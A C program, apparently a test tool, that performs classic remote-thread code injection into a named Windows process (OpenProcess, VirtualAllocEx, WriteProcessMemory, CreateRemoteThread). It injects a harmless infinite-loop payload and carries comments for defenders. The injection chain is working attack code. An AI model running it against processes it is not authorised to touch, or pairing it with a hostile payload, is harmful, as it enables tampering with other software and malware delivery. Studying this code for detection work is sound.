This program can be used to test code injection in a remote process on Windows x86.
/*
This code can be used to test code injection into a remote process.
The CPU usage of the remote process will be at its peak after running this code,
because the injected bytes 0xeb, 0xfe form a two-byte infinite loop (jmp $).
If the remote process shows high CPU usage, you have successfully
injected the code. You can also confirm it by attaching a debugger to the
remote process and setting a breakpoint at the address returned by VirtualAllocEx()
c0d3inj3cT
*/
#include <windows.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <string.h>
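/*
 * Entry point: looks up a running process by executable name, allocates an
 * executable region inside it, copies `code` there and starts a thread on it.
 *
 * argv[1] is the executable name, compared case-sensitively against
 * PROCESSENTRY32.szExeFile as reported by the Toolhelp snapshot.
 * Returns 0 on success and 1 on any failure. Every failure path prints
 * GetLastError() and releases the handles acquired so far; the original
 * version checked none of the Win32 results and leaked all three handles.
 *
 * The payload is 0xEB 0xFE (`jmp $`, a two-byte infinite loop) followed by
 * NOP padding, so a successful injection shows up as the target pinning a
 * CPU core (see the file header).
 *
 * Defender's note: OpenProcess with VM_WRITE|CREATE_THREAD, VirtualAllocEx
 * with PAGE_EXECUTE_READWRITE, WriteProcessMemory and CreateRemoteThread is
 * the textbook remote-thread injection chain; it is exactly the API
 * sequence endpoint monitoring products are built to flag.
 */
int main(int argc, char **argv)
{
    /* 0xEB 0xFE = `jmp $`; the remaining bytes are NOP padding.
     * unsigned char avoids the signed-char narrowing of 0xEB/0xFE. */
    unsigned char code[] = {0xeb, 0xfe, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
    HANDLE psnap = INVALID_HANDLE_VALUE;
    HANDLE process = NULL;
    HANDLE thread = NULL;
    void *address = NULL;
    PROCESSENTRY32 pe;
    DWORD pid = 0;
    DWORD tid = 0;
    int rc = 1;

    /* Validate argc before touching argv[1]: the original read argv[1]
     * first, which is argv[argc] (a NULL slot) when no name is passed. */
    if (argc != 2) {
        printf("usage: processinjector.exe <processname>\n");
        return 1;
    }
    const char *pname = argv[1];

    psnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (psnap == INVALID_HANDLE_VALUE) {
        printf("CreateToolhelp32Snapshot failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }
    /* %p for a HANDLE; %x with a pointer-sized handle is undefined. */
    printf("handle of process snapshot is: %p\n", (void *)psnap);

    /* dwSize must be filled in before Process32First or the call fails. */
    pe.dwSize = sizeof pe;
    if (!Process32First(psnap, &pe)) {
        printf("There was an error in retrieving the process information\n");
        goto out;
    }

    /* Walk the snapshot: the first entry comes from Process32First, the rest
     * from Process32Next. Stop at the first exact name match. */
    do {
        if (strcmp(pname, pe.szExeFile) == 0) {
            pid = pe.th32ProcessID;
            printf("process id is: %lx\n", (unsigned long)pid);
            break;
        }
    } while (Process32Next(psnap, &pe));

    if (pid == 0) {
        printf("process is not running\n");
        goto out;
    }

    process = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ |
                          PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION,
                          FALSE, pid);
    if (process == NULL) {
        printf("OpenProcess failed: %lu\n", (unsigned long)GetLastError());
        goto out;
    }

    /* The original's 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE.
     * Only the payload size is requested; the kernel rounds up to a page. */
    address = VirtualAllocEx(process, NULL, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (address == NULL) {
        printf("VirtualAllocEx failed: %lu\n", (unsigned long)GetLastError());
        goto out;
    }
    printf("Allocated memory in remote process at address: %p\n", address);

    /* A short write would leave a truncated payload, so the byte count is
     * checked as well as the BOOL result. */
    SIZE_T written = 0;
    if (!WriteProcessMemory(process, address, code, sizeof code, &written) ||
        written != sizeof code) {
        printf("WriteProcessMemory failed: %lu\n", (unsigned long)GetLastError());
        goto out;
    }
    printf("code written to memory\n");

    thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)address,
                                NULL, 0, &tid);
    if (thread == NULL) {
        printf("CreateRemoteThread failed: %lu\n", (unsigned long)GetLastError());
        goto out;
    }
    printf("Remote Thread with id: %lx created successfully\n", (unsigned long)tid);
    rc = 0;

out:
    /* Closing our handles does not stop the remote thread; it keeps
     * spinning in the target until that process is terminated. */
    if (thread != NULL) {
        CloseHandle(thread);
    }
    if (process != NULL) {
        CloseHandle(process);
    }
    CloseHandle(psnap);
    return rc;
}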